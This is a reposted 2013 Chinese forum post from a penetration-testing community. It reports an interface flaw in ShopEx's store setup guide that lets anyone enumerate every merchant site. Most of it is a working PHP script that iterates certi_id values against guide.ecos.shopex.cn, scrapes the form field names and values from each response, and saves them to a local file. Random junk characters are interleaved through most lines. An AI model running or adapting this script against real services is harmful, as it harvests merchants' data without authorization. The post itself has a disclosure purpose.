中国网络渗透测试联盟
标题:
ShopEx某接口缺陷可遍历所有用户网站
[打印本页]
作者:
admin
时间:
2013-9-21 15:59
标题:
ShopEx某接口缺陷可遍历所有用户网站
简要描述:
% h G @' L* m1 l3 q/ U
ShopEx某接口缺陷,可遍历所有网站
7 N+ c. z, G% o& _# I+ P! q& o; |
详细说明:
" V( m) i: P9 v3 W" ^# j+ H
问题出现在shopex 网店使用向导页面
# ^: k, U8 {) l& F1 t7 J% E
' X& c0 p0 S2 d( ^; O1 W
/ _2 G' A7 a$ c+ r$ Q% \1 z
U2 @% p' ?3 ^0 h7 q
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
4 o( Y( ]( g9 `/ _
0 I0 b- G2 {, @ `
- J( v% |4 ?9 \ |9 L4 d5 G! ~
- M" Z2 }7 R8 A& T/ p
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
8 g5 a4 R& |- w6 U. Y0 `5 n5 O& `
5 ]& k) _$ B: Q% T3 H( `, @% Q
' b# i3 p+ o" W8 L9 ^$ z
7 h2 u" O0 v- h
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
. M I8 ^& s6 r+ N C) J
4 t$ Q! [5 }" {6 V" W2 L4 Y# j) L
( n, L4 [; j' ~9 a8 u8 p2 ` r, w
+ I* L# X0 h9 |
<?php
' H5 j$ ~ V* z' H8 }* s! S
, t( I1 ?4 B" g9 t- O
for ($i=1; $i < 10000; $i++) { //遍历
9 O/ T- ?9 T6 l( r4 F
$ Q! K% w: h% o1 m0 G0 I1 L, U M* n
ShowshopExD($i);
% y4 J8 k5 j' O3 D
3 y5 n; c: N' t! q' c
}
/ V9 o# e- T& `( X( g" |
8 G% {0 M2 C' z* m% i5 N6 h
function ShowshopExD($cid) {
2 |9 r, }/ [! ]5 N* ^: G
/ J }; s8 A" f9 L/ j: J }
$url='http://guide.ecos.shopex.cn/step2.php';
: [5 _1 z# S. e0 a Y$ D
& [3 G. ~) ]$ i2 L' j
$refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
2 ^4 T s q6 g
4 }; R+ y9 m- S( c
$url = $url.'?refer='.$refer;
4 y8 l: x" ?" L
* x! ?7 n6 H' d4 m4 E
$ch = curl_init($url);
9 S' U+ M) D5 v$ e4 t5 E0 T( V) M: B) |
1 C. w( U, { ^4 C; ^4 {. `
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
/ p& I, E; J: e$ A) U! d/ ~
" F' L4 {4 }( H& b- b
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
6 P9 o9 K7 F9 v: c$ F; _- @
! b, |8 B, R2 w1 O- V/ H
$result = curl_exec($ch);
5 w; i7 q- H: P( ^; A- c/ G
+ U- |. X% t4 n5 b2 m5 r' q
$result = mb_convert_encoding($result, "gb2312", "UTF-8");
3 S/ @% Q4 g1 U" P; A' f+ _& b( Z" _
# x t/ f* W/ P R
if(strpos($result,$refer))
! S3 @, f" `& v
, l, P7 i8 u$ ?6 W
{
" }" L& y3 `) {8 w0 p' Q9 t7 k- R
# d; k. `. E/ t! O
$fp = fopen("c:/shopEx.txt",'ab'); //保存文件
# v% |6 \( B- H D' ^# K
" \' U4 `5 s) r( j
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
' E! P( S) n3 C! K3 N {' N6 D
5 F- |6 t* I3 `; y9 y
foreach ($value[1] as $key) {
0 a0 N# U* \$ }9 }7 D
) I0 d7 U- j% x
preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
) b i& e" n2 v" V, G& i
9 @5 U9 y& z0 A! v5 i
echo $res[1][0].':'.$res[3][0]."\r\n";
" k0 u/ n, l, Z; v
$ ?9 S& J/ ~/ d
$col =$res[1][0].':'.$res[3][0]."\r\n";
4 W! a8 I" g3 _( |7 Y1 c O5 J
+ k2 V* N+ Z0 ~ d$ n
fwrite($fp, $col, strlen($col));
9 F8 ^. G# ~: y
( T6 ]7 F( P, `1 Q5 o4 w
}
5 [) Y4 ]! N/ w- _$ O
) _+ P! \9 r! ^9 s9 Y( b, |
echo '--------------------------------'."\r\n";
2 S$ F# z4 O4 P4 a" u
- i* A) Y! s$ t4 M
fclose($fp);
: [$ a$ \( q Z
, t+ k% F; T5 P/ Q% c9 N3 n
}
/ y2 E9 q* P) r. e0 @
! n* d; Y K1 `6 V4 E1 B
flush();
d( y" }- l" O6 _+ p- ~9 t
& Z. {/ Q- O& Q
curl_close($ch);
; ~. U0 h" ^" T& l- u% J: b
: x; ]1 N7 C4 B; X; E- X) F. f3 x5 W
}
$ g" i. i0 \( Z; j( j# {
; c8 Y# L: {9 H( z' n4 @1 @% U
?>
+ J( B0 P. p- m& l/ |
漏洞证明:
* K* T+ E8 t0 D/ _7 g# y6 U
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
& }/ ]- b7 o1 u; ^: Q
refer换成其他加密方式
! n; g/ W% x2 A6 y" Q/ t/ @' l
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2